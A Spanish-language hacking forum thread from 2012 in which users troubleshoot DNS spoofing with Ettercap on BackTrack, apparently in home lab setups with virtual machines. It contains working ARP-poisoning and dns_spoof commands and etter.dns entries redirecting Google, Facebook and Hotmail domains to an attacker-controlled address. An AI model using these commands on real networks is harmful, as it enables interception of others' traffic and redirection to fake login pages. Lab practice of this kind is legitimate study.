No funciona DNS Spoofing con Ettercap

rockernaxo · 7 Febrero 2012, 09:34 AM

Hola, esta es la primera vez que escribo para este magnífico foro, ya que estoy empezando con Backtrack y hasta el momento todo iba sobre ruedas, pero me he atascado. La cuestión es que tengo dos máquinas virtuales conectadas con adaptador puente a la misma red local e intento redireccionar Internet en el Win 7 desde Backtrack mediante Ettercap. Hago todos los pasos que vienen repetidos en miles de tutoriales, lo he intentado tanto en el terminal como en el modo gráfico, y nada. En la máquina de Win 7 hago un

Código [Seleccionar]

arp -a y sí que mi router y backtrack tienen ahora la misma MAC, por lo que el MiTM no falla. ¿Saben ustedes qué podría ser? Gracias de antemano.

Mordor · 7 Febrero 2012, 22:49 PM

Saludetes;)

Cita de: rockernaxo en 7 Febrero 2012, 09:34 AM
ya que estoy empezando con Backtrack y hasta el momento todo iba sobre ruedas, pero me he atascado...intento redireccionar Internet en el Win 7 desde Backtrack mediante Ettercap. Hago todos los pasos que vienen repetidos en miles de tutoriales, lo he intentado tanto en el terminal como en el modo gráfico, y nada.

¿Qué es exactamente lo que haces? ¿Qué pasos realizas? Si no nos lo dices, no podemos adivinar qué haces mal. Me imagino que también saldrá algún mensaje de error o algo similar ¿Qué aparece..? Más información, necesitamos más información.

rockernaxo · 7 Febrero 2012, 23:42 PM

Bueno, pues tengo un ordenador con dos máquinas virtuales (Virtual Box). Ambas están unidas a la misma red local, una red wifi casera, a través de mi ordenador Guest (Win 7). Bien, pues al lío:

Una máquina virtual tiene Bactrack y la otra Win 7, así que edito el archivo etter.dns y añado:
google.es A 69.55.61.177
*.google.es A 69.55.61.177
www.google.es PTR 69.55.61.177
Guardo y ahora inicio ettercap desde el terminal.

Código [Seleccionar]

ettercap -Tq -P dns_spoof -M arp:remote /ip_router/ /ip_win7(víctima)/
Ahora supuestamente debería redireccionar el tráfico pero no lo hace, en la consola de backtrack me aparece que lo redirecciona, pero en realidad no lo hace, incluso a veces se me queda sin conexión.

PD: no, no obtengo ningún mensaje de error.

jcvandamme · 4 Junio 2012, 18:22 PM

Pues a mi tampoco me va, la diferencia con el es que yo ejecuto ettercap -Tq -P dns_spoof -M arp // //, no obstante tambien lo he probado poniendo la IP de gateway y la ip a "envenenar" pero el resultado es el mismo....lo unico que consigo es que al intentar ir a google simplemente dice que la web no existe, es decir, la ip llega a envenenarse pero no llega a redireccionar y eso que la redireccion iba a ser a una web que tengo aqui en local....mi archivo etter.dns es:
google.es A IP_LOCAL
*.google.es A IP_LOCAL
www.google.es PTR IP_LOCAL

Un cosa mas, las pruebas las he hecho con maquinas virtuales y tambien con otros equipos de la red, el resultado es el mismo. ¿Alguien sabe decirme que es lo que hago mal? Saludossssss

P.D: utilizo backtrack 5 R2

SokarTefnut · 10 Septiembre 2012, 15:05 PM

He probado el procedimiento solo funciona envenenado toda la red, pero con google parece imposible por ahora, he realizado la prueba con facebook y con hotmail y el DNS_SPOOF funciona perfectamente.

En mi caso
192.168.1.1 --> Router
192.168.1.35 --> Bactrack
192.168.1.34 --> Victima (Win 7) (Pruebas con IExplorer 9 y Firefox 14

Extracto de etter.dns -->

*.google.* A 192.168.1.35
*.facebook.* A 192.168.1.35
*.hotmail.* A 192.168.1.35
###############################################

Comienzo el ataque:

ettercap -T -q -P dns_spoof -M arp /192.168.1.1/ /192.168.1.34/

Consulto las tablas ARP en Win 7:
C:\Users\Tom>arp -a

Interfaz: 192.168.1.34 --- 0xb
Dirección de Internet Dirección física Tipo
192.168.1.1 08-00-27-1c-2d-bd dinámico
192.168.1.33 08-00-27-fd-7c-58 dinámico
192.168.1.35 08-00-27-1c-2d-bd dinámico

Vacio la cache de DNS en Win 7:
C:\Users\Tom>ipconfig /flushdns
Configuración IP de Windows
Se vació correctamente la caché de resolución de DNS.

Intento abric google,facebook y hotmail, no obteniendo los resultados esperados (DNSSPOOF),se siguen abriendo las páginas originales.

Si el envenenamiento lo realizo de la suiguiente manera:
ettercap -T -q -P dns_spoof -M arp // //

si funciona con facebook y con hotmail, pero curiosamente Google no es redireccionado hacia mi página falsa.

Si desde Windows analizo las resoluciones almacenadas hasta el momento,se observa que aunque la resolucion para google es la correcta (con mi etter.dns), la página no abre.
C:\Users\Tom>ipconfig /displaydns

Configuración IP de Windows

www.facebook.com
----------------------------------------
Nombre de registro . : www.facebook.com
Tipo de registro . . : 1
Período de vida . . . : 3581
Longitud de datos . . : 4
Sección . . . . . . . : respuesta
Un registro (host). . : 192.168.1.35

www.hotmail.es
----------------------------------------
Nombre de registro . : www.hotmail.es
Tipo de registro . . : 1
Período de vida . . . : 3590
Longitud de datos . . : 4
Sección . . . . . . . : respuesta
Un registro (host). . : 192.168.1.35

www.google.es
----------------------------------------
Nombre de registro . : www.google.es
Tipo de registro . . : 1
Período de vida . . . : 3566
Longitud de datos . . : 4
Sección . . . . . . . : respuesta
Un registro (host). . : 192.168.1.35

En ambos navegadores tengo como página de inicio predeterminada www.google.es, no se
si tiene algo que ver con el fallo del DNS_SPOOF.

morodog · 10 Octubre 2012, 05:18 AM

Sí a mi también me pasa, me funciona con todas las webs menos con google. FuCK

cyberboom! · 4 Noviembre 2012, 03:54 AM

yo configuro el etter.dns, primeramene localizado con un locate etter.dns,

Código [Seleccionar]


*.google.*             A       127.0.0.1
*.facebook.*          A      127.0.0.1
*.hotmail.*            A      127.0.0.1

despues hago un:

Código [Seleccionar]


ettercap -T -q -i wlan0 -P dns_spoof -M arp //

y todas las webs son spoofeadas de maravilla:p